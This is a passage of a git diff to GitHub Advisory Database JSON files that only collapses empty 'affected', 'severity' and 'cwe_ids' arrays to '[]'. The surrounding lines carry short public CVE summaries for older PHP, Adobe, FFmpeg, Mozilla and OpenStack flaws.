100644 --- a/advisories/unreviewed/2022/05/GHSA-8c3v-xj7m-q437/GHSA-8c3v-xj7m-q437.json +++ b/advisories/unreviewed/2022/05/GHSA-8c3v-xj7m-q437/GHSA-8c3v-xj7m-q437.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -43,9 +41,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-8c5g-jh8w-2ffj/GHSA-8c5g-jh8w-2ffj.json b/advisories/unreviewed/2022/05/GHSA-8c5g-jh8w-2ffj/GHSA-8c5g-jh8w-2ffj.json index 1d976b4321c..9a7db716abf 100644 --- a/advisories/unreviewed/2022/05/GHSA-8c5g-jh8w-2ffj/GHSA-8c5g-jh8w-2ffj.json +++ b/advisories/unreviewed/2022/05/GHSA-8c5g-jh8w-2ffj/GHSA-8c5g-jh8w-2ffj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -67,9 +65,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-8c7c-9pp7-6933/GHSA-8c7c-9pp7-6933.json b/advisories/unreviewed/2022/05/GHSA-8c7c-9pp7-6933/GHSA-8c7c-9pp7-6933.json index 63e3974c4f9..266aa619f6b 100644 --- a/advisories/unreviewed/2022/05/GHSA-8c7c-9pp7-6933/GHSA-8c7c-9pp7-6933.json +++ b/advisories/unreviewed/2022/05/GHSA-8c7c-9pp7-6933/GHSA-8c7c-9pp7-6933.json @@ -7,12 +7,8 @@ "CVE-2008-5498" ], "details": "Array index error in the imageRotate function in PHP 5.2.8 and earlier allows context-dependent attackers to read the contents of arbitrary memory locations via a crafted value of the third argument (aka the bgd_color or clrBack argument) for an indexed image.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8c8w-rg9g-xrh8/GHSA-8c8w-rg9g-xrh8.json b/advisories/unreviewed/2022/05/GHSA-8c8w-rg9g-xrh8/GHSA-8c8w-rg9g-xrh8.json index ca27d729ecf..624b30b57b9 100644 --- a/advisories/unreviewed/2022/05/GHSA-8c8w-rg9g-xrh8/GHSA-8c8w-rg9g-xrh8.json +++ b/advisories/unreviewed/2022/05/GHSA-8c8w-rg9g-xrh8/GHSA-8c8w-rg9g-xrh8.json @@ -7,12 +7,8 @@ "CVE-2010-3656" ], "details": "Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows attackers to cause a denial of service via unknown vectors, a different vulnerability than CVE-2010-3657.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -56,9 +52,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-8ccp-76j3-r8wf/GHSA-8ccp-76j3-r8wf.json b/advisories/unreviewed/2022/05/GHSA-8ccp-76j3-r8wf/GHSA-8ccp-76j3-r8wf.json index 691dac3a961..b91a1914b08 100644 --- a/advisories/unreviewed/2022/05/GHSA-8ccp-76j3-r8wf/GHSA-8ccp-76j3-r8wf.json +++ b/advisories/unreviewed/2022/05/GHSA-8ccp-76j3-r8wf/GHSA-8ccp-76j3-r8wf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8cq4-3442-743f/GHSA-8cq4-3442-743f.json b/advisories/unreviewed/2022/05/GHSA-8cq4-3442-743f/GHSA-8cq4-3442-743f.json index a087c2a8227..806fc96efde 100644 --- a/advisories/unreviewed/2022/05/GHSA-8cq4-3442-743f/GHSA-8cq4-3442-743f.json +++ b/advisories/unreviewed/2022/05/GHSA-8cq4-3442-743f/GHSA-8cq4-3442-743f.json @@ -7,12 +7,8 @@ "CVE-2013-0996" ], "details": "WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-8f3m-v9r8-jc7p/GHSA-8f3m-v9r8-jc7p.json b/advisories/unreviewed/2022/05/GHSA-8f3m-v9r8-jc7p/GHSA-8f3m-v9r8-jc7p.json index 394cb874ac2..a9536520d35 100644 --- a/advisories/unreviewed/2022/05/GHSA-8f3m-v9r8-jc7p/GHSA-8f3m-v9r8-jc7p.json +++ b/advisories/unreviewed/2022/05/GHSA-8f3m-v9r8-jc7p/GHSA-8f3m-v9r8-jc7p.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8ffc-33px-g32x/GHSA-8ffc-33px-g32x.json b/advisories/unreviewed/2022/05/GHSA-8ffc-33px-g32x/GHSA-8ffc-33px-g32x.json index d1f15725067..d59be823293 100644 --- a/advisories/unreviewed/2022/05/GHSA-8ffc-33px-g32x/GHSA-8ffc-33px-g32x.json +++ b/advisories/unreviewed/2022/05/GHSA-8ffc-33px-g32x/GHSA-8ffc-33px-g32x.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8ffr-89xh-hq29/GHSA-8ffr-89xh-hq29.json b/advisories/unreviewed/2022/05/GHSA-8ffr-89xh-hq29/GHSA-8ffr-89xh-hq29.json index a351de1c0ff..63476803ca7 100644 --- a/advisories/unreviewed/2022/05/GHSA-8ffr-89xh-hq29/GHSA-8ffr-89xh-hq29.json +++ b/advisories/unreviewed/2022/05/GHSA-8ffr-89xh-hq29/GHSA-8ffr-89xh-hq29.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8fqv-93g6-24c7/GHSA-8fqv-93g6-24c7.json b/advisories/unreviewed/2022/05/GHSA-8fqv-93g6-24c7/GHSA-8fqv-93g6-24c7.json index 85fc37a4ec7..1478000a3ec 100644 --- a/advisories/unreviewed/2022/05/GHSA-8fqv-93g6-24c7/GHSA-8fqv-93g6-24c7.json +++ b/advisories/unreviewed/2022/05/GHSA-8fqv-93g6-24c7/GHSA-8fqv-93g6-24c7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8fr9-2wh5-f97x/GHSA-8fr9-2wh5-f97x.json b/advisories/unreviewed/2022/05/GHSA-8fr9-2wh5-f97x/GHSA-8fr9-2wh5-f97x.json index 2ef9a9a9985..7b5cfd7420c 100644 --- a/advisories/unreviewed/2022/05/GHSA-8fr9-2wh5-f97x/GHSA-8fr9-2wh5-f97x.json +++ b/advisories/unreviewed/2022/05/GHSA-8fr9-2wh5-f97x/GHSA-8fr9-2wh5-f97x.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8fvv-pqph-jh9m/GHSA-8fvv-pqph-jh9m.json b/advisories/unreviewed/2022/05/GHSA-8fvv-pqph-jh9m/GHSA-8fvv-pqph-jh9m.json index 6f78da92944..8a82caf4ef0 100644 --- a/advisories/unreviewed/2022/05/GHSA-8fvv-pqph-jh9m/GHSA-8fvv-pqph-jh9m.json +++ b/advisories/unreviewed/2022/05/GHSA-8fvv-pqph-jh9m/GHSA-8fvv-pqph-jh9m.json @@ -7,12 +7,8 @@ "CVE-2012-2796" ], "details": "Unspecified vulnerability in the vc1_decode_frame function in libavcodec/vc1dec.c in FFmpeg before 0.11 and Libav 0.8.x before 0.8.4 has unknown impact and attack vectors, related to inconsistencies in \"coded slice positions and interlacing\" that trigger \"out of array writes.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -56,9 +52,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-8gmf-f532-w2j5/GHSA-8gmf-f532-w2j5.json b/advisories/unreviewed/2022/05/GHSA-8gmf-f532-w2j5/GHSA-8gmf-f532-w2j5.json index cd386fb8729..4934ab33fe2 100644 --- a/advisories/unreviewed/2022/05/GHSA-8gmf-f532-w2j5/GHSA-8gmf-f532-w2j5.json +++ b/advisories/unreviewed/2022/05/GHSA-8gmf-f532-w2j5/GHSA-8gmf-f532-w2j5.json @@ -7,12 +7,8 @@ "CVE-2012-2792" ], "details": "Unspecified vulnerability in the decode_init function in libavcodec/wmalosslessdec.c in FFmpeg before 0.11 has unknown impact and attack vectors, related to the samples per frame.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-8gr4-47p2-7q2w/GHSA-8gr4-47p2-7q2w.json b/advisories/unreviewed/2022/05/GHSA-8gr4-47p2-7q2w/GHSA-8gr4-47p2-7q2w.json index e54e0b2d676..a1a8cb89eb6 100644 --- a/advisories/unreviewed/2022/05/GHSA-8gr4-47p2-7q2w/GHSA-8gr4-47p2-7q2w.json +++ b/advisories/unreviewed/2022/05/GHSA-8gr4-47p2-7q2w/GHSA-8gr4-47p2-7q2w.json @@ -7,12 +7,8 @@ "CVE-2012-2801" ], "details": "Unspecified vulnerability in libavcodec/avs.c in FFmpeg before 0.11, and Libav 0.7.x before 0.7.7 and 0.8.x before 0.8.4, has unknown impact and attack vectors, related to dimensions and \"out of array writes.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -68,9 +64,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-8jfh-c5c9-f6fm/GHSA-8jfh-c5c9-f6fm.json b/advisories/unreviewed/2022/05/GHSA-8jfh-c5c9-f6fm/GHSA-8jfh-c5c9-f6fm.json index e07c4f46fea..a5e6ecd7fb1 100644 --- a/advisories/unreviewed/2022/05/GHSA-8jfh-c5c9-f6fm/GHSA-8jfh-c5c9-f6fm.json +++ b/advisories/unreviewed/2022/05/GHSA-8jfh-c5c9-f6fm/GHSA-8jfh-c5c9-f6fm.json @@ -7,12 +7,8 @@ "CVE-2015-6030" ], "details": "HP ArcSight Logger 6.0.0.7307.1, ArcSight Command Center 6.8.0.1896.0, and ArcSight Connector Appliance 6.4.0.6881.3 use the root account to execute files owned by the arcsight user, which might allow local users to gain privileges by leveraging arcsight account access.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-8mfm-2hq6-fqgv/GHSA-8mfm-2hq6-fqgv.json b/advisories/unreviewed/2022/05/GHSA-8mfm-2hq6-fqgv/GHSA-8mfm-2hq6-fqgv.json index e1b0f180db6..2d54bd1244f 100644 --- a/advisories/unreviewed/2022/05/GHSA-8mfm-2hq6-fqgv/GHSA-8mfm-2hq6-fqgv.json +++ b/advisories/unreviewed/2022/05/GHSA-8mfm-2hq6-fqgv/GHSA-8mfm-2hq6-fqgv.json @@ -7,12 +7,8 @@ "CVE-2010-3619" ], "details": "Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-2890, CVE-2010-3621, CVE-2010-3622, CVE-2010-3628, CVE-2010-3632, and CVE-2010-3658.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8pfh-fp39-c5p7/GHSA-8pfh-fp39-c5p7.json b/advisories/unreviewed/2022/05/GHSA-8pfh-fp39-c5p7/GHSA-8pfh-fp39-c5p7.json index 7151ad120c3..ad9acd376bb 100644 --- a/advisories/unreviewed/2022/05/GHSA-8pfh-fp39-c5p7/GHSA-8pfh-fp39-c5p7.json +++ b/advisories/unreviewed/2022/05/GHSA-8pfh-fp39-c5p7/GHSA-8pfh-fp39-c5p7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8pgq-587r-5r5g/GHSA-8pgq-587r-5r5g.json b/advisories/unreviewed/2022/05/GHSA-8pgq-587r-5r5g/GHSA-8pgq-587r-5r5g.json index b7db61ef40b..55bd7c4f634 100644 --- a/advisories/unreviewed/2022/05/GHSA-8pgq-587r-5r5g/GHSA-8pgq-587r-5r5g.json +++ b/advisories/unreviewed/2022/05/GHSA-8pgq-587r-5r5g/GHSA-8pgq-587r-5r5g.json @@ -7,12 +7,8 @@ "CVE-2014-1637" ], "details": "Command School Student Management System 1.06.01 does not properly restrict access to sw/backup/backup_ray2.php, which allows remote attackers to download a database backup via a direct request.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8rq9-mgjw-g998/GHSA-8rq9-mgjw-g998.json b/advisories/unreviewed/2022/05/GHSA-8rq9-mgjw-g998/GHSA-8rq9-mgjw-g998.json index a9eba62a5d5..46d806e0b77 100644 --- a/advisories/unreviewed/2022/05/GHSA-8rq9-mgjw-g998/GHSA-8rq9-mgjw-g998.json +++ b/advisories/unreviewed/2022/05/GHSA-8rq9-mgjw-g998/GHSA-8rq9-mgjw-g998.json @@ -7,12 +7,8 @@ "CVE-2013-5602" ], "details": "The Worker::SetEventListener function in the Web workers implementation in Mozilla Firefox before 25.0, Firefox ESR 17.x before 17.0.10 and 24.x before 24.1, Thunderbird before 24.1, Thunderbird ESR 17.x before 17.0.10, and SeaMonkey before 2.22 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via vectors related to direct proxies.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8v48-9cmx-xcmc/GHSA-8v48-9cmx-xcmc.json b/advisories/unreviewed/2022/05/GHSA-8v48-9cmx-xcmc/GHSA-8v48-9cmx-xcmc.json index 2b6cc661bfe..2d16629b9c4 100644 --- a/advisories/unreviewed/2022/05/GHSA-8v48-9cmx-xcmc/GHSA-8v48-9cmx-xcmc.json +++ b/advisories/unreviewed/2022/05/GHSA-8v48-9cmx-xcmc/GHSA-8v48-9cmx-xcmc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8v4v-wpqg-cgmx/GHSA-8v4v-wpqg-cgmx.json b/advisories/unreviewed/2022/05/GHSA-8v4v-wpqg-cgmx/GHSA-8v4v-wpqg-cgmx.json index ee51519eb73..962196cb046 100644 --- a/advisories/unreviewed/2022/05/GHSA-8v4v-wpqg-cgmx/GHSA-8v4v-wpqg-cgmx.json +++ b/advisories/unreviewed/2022/05/GHSA-8v4v-wpqg-cgmx/GHSA-8v4v-wpqg-cgmx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8wgg-7fpq-c3vx/GHSA-8wgg-7fpq-c3vx.json b/advisories/unreviewed/2022/05/GHSA-8wgg-7fpq-c3vx/GHSA-8wgg-7fpq-c3vx.json index b3fb6815211..2987acb6bde 100644 --- a/advisories/unreviewed/2022/05/GHSA-8wgg-7fpq-c3vx/GHSA-8wgg-7fpq-c3vx.json +++ b/advisories/unreviewed/2022/05/GHSA-8wgg-7fpq-c3vx/GHSA-8wgg-7fpq-c3vx.json @@ -7,12 +7,8 @@ "CVE-2010-3909" ], "details": "Incomplete blacklist vulnerability in config.template.php in vtiger CRM before 5.2.1 allows remote authenticated users to execute arbitrary code by using the draft save feature in the Compose Mail component to upload a file with a .phtml extension, and then accessing this file via a direct request to the file in the storage/ directory tree.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8wpw-79fh-c32h/GHSA-8wpw-79fh-c32h.json b/advisories/unreviewed/2022/05/GHSA-8wpw-79fh-c32h/GHSA-8wpw-79fh-c32h.json index bd4b9095c92..ad278bcab34 100644 --- a/advisories/unreviewed/2022/05/GHSA-8wpw-79fh-c32h/GHSA-8wpw-79fh-c32h.json +++ b/advisories/unreviewed/2022/05/GHSA-8wpw-79fh-c32h/GHSA-8wpw-79fh-c32h.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8xc2-rv49-c3h6/GHSA-8xc2-rv49-c3h6.json b/advisories/unreviewed/2022/05/GHSA-8xc2-rv49-c3h6/GHSA-8xc2-rv49-c3h6.json index 5d765afcc32..6a4d5d8e515 100644 --- a/advisories/unreviewed/2022/05/GHSA-8xc2-rv49-c3h6/GHSA-8xc2-rv49-c3h6.json +++ b/advisories/unreviewed/2022/05/GHSA-8xc2-rv49-c3h6/GHSA-8xc2-rv49-c3h6.json @@ -7,12 +7,8 @@ "CVE-2013-1011" ], "details": "WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-8xwf-9fxw-xh59/GHSA-8xwf-9fxw-xh59.json b/advisories/unreviewed/2022/05/GHSA-8xwf-9fxw-xh59/GHSA-8xwf-9fxw-xh59.json index 4e38656e657..08875f903ba 100644 --- a/advisories/unreviewed/2022/05/GHSA-8xwf-9fxw-xh59/GHSA-8xwf-9fxw-xh59.json +++ b/advisories/unreviewed/2022/05/GHSA-8xwf-9fxw-xh59/GHSA-8xwf-9fxw-xh59.json @@ -7,12 +7,8 @@ "CVE-2010-2181" ], "details": "Integer overflow in Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64, and Adobe AIR before 2.0.2.12610, might allow attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2010-2170 and CVE-2010-2183.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -136,9 +132,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-943v-q963-5fvx/GHSA-943v-q963-5fvx.json b/advisories/unreviewed/2022/05/GHSA-943v-q963-5fvx/GHSA-943v-q963-5fvx.json index 871ad0ce6db..cfac8a6aca5 100644 --- a/advisories/unreviewed/2022/05/GHSA-943v-q963-5fvx/GHSA-943v-q963-5fvx.json +++ b/advisories/unreviewed/2022/05/GHSA-943v-q963-5fvx/GHSA-943v-q963-5fvx.json @@ -7,12 +7,8 @@ "CVE-2013-6433" ], "details": "The default configuration in the Red Hat openstack-neutron package before 2013.2.3-7 does not properly set a configuration file for rootwrap, which allows remote attackers to gain privileges via a crafted configuration file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-94hh-vfrm-jc8h/GHSA-94hh-vfrm-jc8h.json b/advisories/unreviewed/2022/05/GHSA-94hh-vfrm-jc8h/GHSA-94hh-vfrm-jc8h.json index b74aeac48c9..faa723720e5 100644 --- a/advisories/unreviewed/2022/05/GHSA-94hh-vfrm-jc8h/GHSA-94hh-vfrm-jc8h.json +++ b/advisories/unreviewed/2022/05/GHSA-94hh-vfrm-jc8h/GHSA-94hh-vfrm-jc8h.json @@ -7,12 +7,8 @@ "CVE-2011-0603" ], "details": "Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted image, a different vulnerability than CVE-2011-0566 and CVE-2011-0567.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-94q4-28cq-xq66/GHSA-94q4-28cq-xq66.json b/advisories/unreviewed/2022/05/GHSA-94q4-28cq-xq66/GHSA-94q4-28cq-xq66.json index cefcf14e1bb..08bc13ee933 100644 --- a/advisories/unreviewed/2022/05/GHSA-94q4-28cq-xq66/GHSA-94q4-28cq-xq66.json +++ b/advisories/unreviewed/2022/05/GHSA-94q4-28cq-xq66/GHSA-94q4-28cq-xq66.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-94r4-9j59-hcxh/GHSA-94r4-9j59-hcxh.json b/advisories/unreviewed/2022/05/GHSA-94r4-9j59-hcxh/GHSA-94r4-9j59-hcxh.json index bc5f9c3d53b..53e1fed0c11 100644 --- a/advisories/unreviewed/2022/05/GHSA-94r4-9j59-hcxh/GHSA-94r4-9j59-hcxh.json +++ b/advisories/unreviewed/2022/05/GHSA-94r4-9j59-hcxh/GHSA-94r4-9j59-hcxh.json @@ -7,12 +7,8 @@ "CVE-2012-0854" ], "details": "The dpcm_decode_frame function in libavcodec/dpcm.c in FFmpeg before 0.9.1 does not use the proper pointer after an audio API change, which allows remote attackers to cause a denial of service (application crash) via unspecified vectors, which triggers a heap-based buffer overflow.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-94x8-hxww-p5g2/GHSA-94x8-hxww-p5g2.json b/advisories/unreviewed/2022/05/GHSA-94x8-hxww-p5g2/GHSA-94x8-hxww-p5g2.json index ede25083a1b..9360864500b 100644 --- a/advisories/unreviewed/2022/05/GHSA-94x8-hxww-p5g2/GHSA-94x8-hxww-p5g2.json +++ b/advisories/unreviewed/2022/05/GHSA-94x8-hxww-p5g2/GHSA-94x8-hxww-p5g2.json @@ -7,12 +7,8 @@ "CVE-2014-6414" ], "details": "OpenStack Neutron before 2014.2.4 and 2014.1 before 2014.1.2 allows remote authenticated users to set admin network attributes to default values via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -48,9 +44,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-95cx-92pf-pxrr/GHSA-95cx-92pf-pxrr.json b/advisories/unreviewed/2022/05/GHSA-95cx-92pf-pxrr/GHSA-95cx-92pf-pxrr.json index 29d3416977c..e64d0e84dc6 100644 --- a/advisories/unreviewed/2022/05/GHSA-95cx-92pf-pxrr/GHSA-95cx-92pf-pxrr.json +++ b/advisories/unreviewed/2022/05/GHSA-95cx-92pf-pxrr/GHSA-95cx-92pf-pxrr.json @@ -7,12 +7,8 @@ "CVE-2013-5604" ], "details": "The txXPathNodeUtils::getBaseURI function in the XSLT processor in Mozilla Firefox before 25.0, Firefox ESR 17.x before 17.0.10 and 24.x before 24.1, Thunderbird before 24.1, Thunderbird ESR 17.x before 17.0.10, and SeaMonkey before 2.22 does not properly initialize data, which allows remote attackers to execute arbitrary code or cause a denial of service (stack-based buffer overflow and application crash) via crafted documents.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-96gg-49pp-g835/GHSA-96gg-49pp-g835.json b/advisories/unreviewed/2022/05/GHSA-96gg-49pp-g835/GHSA-96gg-49pp-g835.json index 7f7523891ea..a5805491723 100644 --- a/advisories/unreviewed/2022/05/GHSA-96gg-49pp-g835/GHSA-96gg-49pp-g835.json +++ b/advisories/unreviewed/2022/05/GHSA-96gg-49pp-g835/GHSA-96gg-49pp-g835.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-97mw-f25q-wc3x/GHSA-97mw-f25q-wc3x.json b/advisories/unreviewed/2022/05/GHSA-97mw-f25q-wc3x/GHSA-97mw-f25q-wc3x.json index d305e8d1f11..9fc02b407a2 100644 --- a/advisories/unreviewed/2022/05/GHSA-97mw-f25q-wc3x/GHSA-97mw-f25q-wc3x.json +++ b/advisories/unreviewed/2022/05/GHSA-97mw-f25q-wc3x/GHSA-97mw-f25q-wc3x.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-98rp-qwvr-j7cp/GHSA-98rp-qwvr-j7cp.json b/advisories/unreviewed/2022/05/GHSA-98rp-qwvr-j7cp/GHSA-98rp-qwvr-j7cp.json index a8357ce9ed8..6d457035e09 100644 --- a/advisories/unreviewed/2022/05/GHSA-98rp-qwvr-j7cp/GHSA-98rp-qwvr-j7cp.json +++ b/advisories/unreviewed/2022/05/GHSA-98rp-qwvr-j7cp/GHSA-98rp-qwvr-j7cp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-998q-gh7x-jc4m/GHSA-998q-gh7x-jc4m.json b/advisories/unreviewed/2022/05/GHSA-998q-gh7x-jc4m/GHSA-998q-gh7x-jc4m.json index f35a94c9c1f..eee4ddf5dd7 100644 --- a/advisories/unreviewed/2022/05/GHSA-998q-gh7x-jc4m/GHSA-998q-gh7x-jc4m.json +++ b/advisories/unreviewed/2022/05/GHSA-998q-gh7x-jc4m/GHSA-998q-gh7x-jc4m.json @@ -7,12 +7,8 @@ "CVE-2010-2161" ], "details": "Array index error in Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64, and Adobe AIR before 2.0.2.12610, might allow attackers to execute arbitrary code via unspecified \"types of Adobe Flash code.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git 